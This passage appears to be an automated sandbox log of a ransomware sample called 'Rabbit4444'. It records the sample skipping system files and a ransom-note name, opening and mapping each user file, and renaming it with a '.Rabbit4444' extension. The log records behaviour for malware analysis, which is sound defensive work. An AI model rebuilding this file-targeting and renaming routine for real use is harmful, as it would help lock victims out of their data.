lpFrequency=0x130bfb8*=100000000) returned 1 [0056.945] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14825610925) returned 1 [0056.945] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1303) returned 1 [0056.945] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0056.945] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101738 [0056.946] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x820, lpName=0x0) returned 0x298 [0056.947] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x820) returned 0x70000 [0056.947] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.947] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0056.947] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.947] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0056.947] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.948] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0056.948] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.948] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0056.948] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14825853046) returned 1 [0056.948] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0056.948] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101738 | out: hHeap=0xe0000) returned 1 [0056.948] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.948] CloseHandle (hObject=0x298) returned 1 [0056.948] CloseHandle (hObject=0x278) returned 1 [0056.948] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_IsMouseKeysEnabled.settingcontent-ms.Rabbit4444") returned 197 [0056.948] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_IsMouseKeysEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_accessibility_ismousekeysenabled.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_IsMouseKeysEnabled.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_accessibility_ismousekeysenabled.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.949] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1973f586, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x1973f586, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23458c07, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x547, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Accessibility_IsOverlappedContentEnabled.settingcontent-ms", cAlternateFileName="AAA_SY~4.SET")) returned 1 [0056.949] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_IsOverlappedContentEnabled.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.949] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_IsOverlappedContentEnabled.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.949] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_IsOverlappedContentEnabled.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.949] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_IsOverlappedContentEnabled.settingcontent-ms", lpString2=".") returned 1 [0056.949] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_IsOverlappedContentEnabled.settingcontent-ms", lpString2="..") returned 1 [0056.949] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_IsOverlappedContentEnabled.settingcontent-ms", lpString2="windows") returned -1 [0056.949] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_IsOverlappedContentEnabled.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.949] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_IsOverlappedContentEnabled.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.949] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_IsOverlappedContentEnabled.settingcontent-ms", lpString2="boot") returned -1 [0056.949] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_IsOverlappedContentEnabled.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.949] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_IsOverlappedContentEnabled.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.949] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Accessibility_IsOverlappedContentEnabled.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Accessibility_IsOverlappedContentEnabled.settingcontent-ms") returned="AAA_SystemSettings_Accessibility_IsOverlappedContentEnabled.settingcontent-ms" [0056.949] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_IsOverlappedContentEnabled.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.950] lstrlenW (lpString="AAA_SystemSettings_Accessibility_IsOverlappedContentEnabled.settingcontent-ms") returned 77 [0056.950] lstrlenW (lpString="Rabbit4444") returned 10 [0056.950] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.950] lstrlenW (lpString=".dll") returned 4 [0056.950] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.950] lstrlenW (lpString=".lnk") returned 4 [0056.950] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.950] lstrlenW (lpString=".ini") returned 4 [0056.950] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.950] lstrlenW (lpString=".sys") returned 4 [0056.950] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.950] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_IsOverlappedContentEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_accessibility_isoverlappedcontentenabled.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.950] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.950] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14826092240) returned 1 [0056.950] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1351) returned 1 [0056.950] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0056.950] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1016b0 [0056.950] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x850, lpName=0x0) returned 0x298 [0056.955] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x850) returned 0x70000 [0056.955] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.955] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0056.956] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.956] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0056.956] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.956] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0056.956] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.956] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0056.956] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14826670095) returned 1 [0056.956] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0056.956] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1016b0 | out: hHeap=0xe0000) returned 1 [0056.956] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.956] CloseHandle (hObject=0x298) returned 1 [0056.956] CloseHandle (hObject=0x278) returned 1 [0056.956] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_IsOverlappedContentEnabled.settingcontent-ms.Rabbit4444") returned 205 [0056.956] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_IsOverlappedContentEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_accessibility_isoverlappedcontentenabled.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_IsOverlappedContentEnabled.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_accessibility_isoverlappedcontentenabled.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.957] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19d353a9, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x19d353a9, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23884dd1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x54d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Accessibility_Magnifier_IsAutoStartEnabled.settingcontent-ms", cAlternateFileName="AA5254~1.SET")) returned 1 [0056.957] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Magnifier_IsAutoStartEnabled.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.957] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Magnifier_IsAutoStartEnabled.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.957] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Magnifier_IsAutoStartEnabled.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.957] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Magnifier_IsAutoStartEnabled.settingcontent-ms", lpString2=".") returned 1 [0056.957] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Magnifier_IsAutoStartEnabled.settingcontent-ms", lpString2="..") returned 1 [0056.957] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Magnifier_IsAutoStartEnabled.settingcontent-ms", lpString2="windows") returned -1 [0056.957] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Magnifier_IsAutoStartEnabled.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.958] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Magnifier_IsAutoStartEnabled.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.958] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Magnifier_IsAutoStartEnabled.settingcontent-ms", lpString2="boot") returned -1 [0056.958] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Magnifier_IsAutoStartEnabled.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.958] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Magnifier_IsAutoStartEnabled.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.958] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Accessibility_Magnifier_IsAutoStartEnabled.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Accessibility_Magnifier_IsAutoStartEnabled.settingcontent-ms") returned="AAA_SystemSettings_Accessibility_Magnifier_IsAutoStartEnabled.settingcontent-ms" [0056.958] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Magnifier_IsAutoStartEnabled.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.958] lstrlenW (lpString="AAA_SystemSettings_Accessibility_Magnifier_IsAutoStartEnabled.settingcontent-ms") returned 79 [0056.958] lstrlenW (lpString="Rabbit4444") returned 10 [0056.958] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.958] lstrlenW (lpString=".dll") returned 4 [0056.958] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.958] lstrlenW (lpString=".lnk") returned 4 [0056.958] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.958] lstrlenW (lpString=".ini") returned 4 [0056.958] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.958] lstrlenW (lpString=".sys") returned 4 [0056.958] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.958] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Magnifier_IsAutoStartEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_accessibility_magnifier_isautostartenabled.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.959] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.959] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14826941775) returned 1 [0056.959] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1357) returned 1 [0056.959] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0056.959] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1015a0 [0056.959] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x850, lpName=0x0) returned 0x298 [0056.960] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x850) returned 0x70000 [0056.961] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.961] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0056.961] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.961] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0056.961] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.961] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0056.961] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.961] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0056.961] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14827179047) returned 1 [0056.961] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0056.961] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1015a0 | out: hHeap=0xe0000) returned 1 [0056.961] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.961] CloseHandle (hObject=0x298) returned 1 [0056.961] CloseHandle (hObject=0x278) returned 1 [0056.961] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Magnifier_IsAutoStartEnabled.settingcontent-ms.Rabbit4444") returned 207 [0056.961] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Magnifier_IsAutoStartEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_accessibility_magnifier_isautostartenabled.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Magnifier_IsAutoStartEnabled.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_accessibility_magnifier_isautostartenabled.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.962] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a6725c0, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x1a6725c0, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2340c766, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x520, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Accessibility_Magnifier_IsEnabled.settingcontent-ms", cAlternateFileName="AA2C2E~1.SET")) returned 1 [0056.962] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Magnifier_IsEnabled.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.962] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Magnifier_IsEnabled.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.962] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Magnifier_IsEnabled.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.962] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Magnifier_IsEnabled.settingcontent-ms", lpString2=".") returned 1 [0056.962] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Magnifier_IsEnabled.settingcontent-ms", lpString2="..") returned 1 [0056.962] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Magnifier_IsEnabled.settingcontent-ms", lpString2="windows") returned -1 [0056.962] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Magnifier_IsEnabled.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.962] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Magnifier_IsEnabled.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.962] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Magnifier_IsEnabled.settingcontent-ms", lpString2="boot") returned -1 [0056.962] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Magnifier_IsEnabled.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.962] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Magnifier_IsEnabled.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.962] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Accessibility_Magnifier_IsEnabled.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Accessibility_Magnifier_IsEnabled.settingcontent-ms") returned="AAA_SystemSettings_Accessibility_Magnifier_IsEnabled.settingcontent-ms" [0056.962] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Magnifier_IsEnabled.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.963] lstrlenW (lpString="AAA_SystemSettings_Accessibility_Magnifier_IsEnabled.settingcontent-ms") returned 70 [0056.963] lstrlenW (lpString="Rabbit4444") returned 10 [0056.963] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.963] lstrlenW (lpString=".dll") returned 4 [0056.963] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.963] lstrlenW (lpString=".lnk") returned 4 [0056.963] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.963] lstrlenW (lpString=".ini") returned 4 [0056.963] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.963] lstrlenW (lpString=".sys") returned 4 [0056.963] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.963] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Magnifier_IsEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_accessibility_magnifier_isenabled.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.963] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.963] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14827397878) returned 1 [0056.963] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1312) returned 1 [0056.963] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0056.963] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102150 [0056.963] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x820, lpName=0x0) returned 0x298 [0056.964] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x820) returned 0x70000 [0056.965] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.965] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0056.965] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.965] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0056.965] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.966] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0056.966] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.966] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0056.966] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14827642955) returned 1 [0056.966] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0056.966] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102150 | out: hHeap=0xe0000) returned 1 [0056.966] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.966] CloseHandle (hObject=0x298) returned 1 [0056.966] CloseHandle (hObject=0x278) returned 1 [0056.966] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Magnifier_IsEnabled.settingcontent-ms.Rabbit4444") returned 198 [0056.966] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Magnifier_IsEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_accessibility_magnifier_isenabled.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Magnifier_IsEnabled.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_accessibility_magnifier_isenabled.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.967] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ac683dd, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x1ac683dd, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23a287a5, ftLastWriteTime.dwHighDateTime=0x1d112e3, 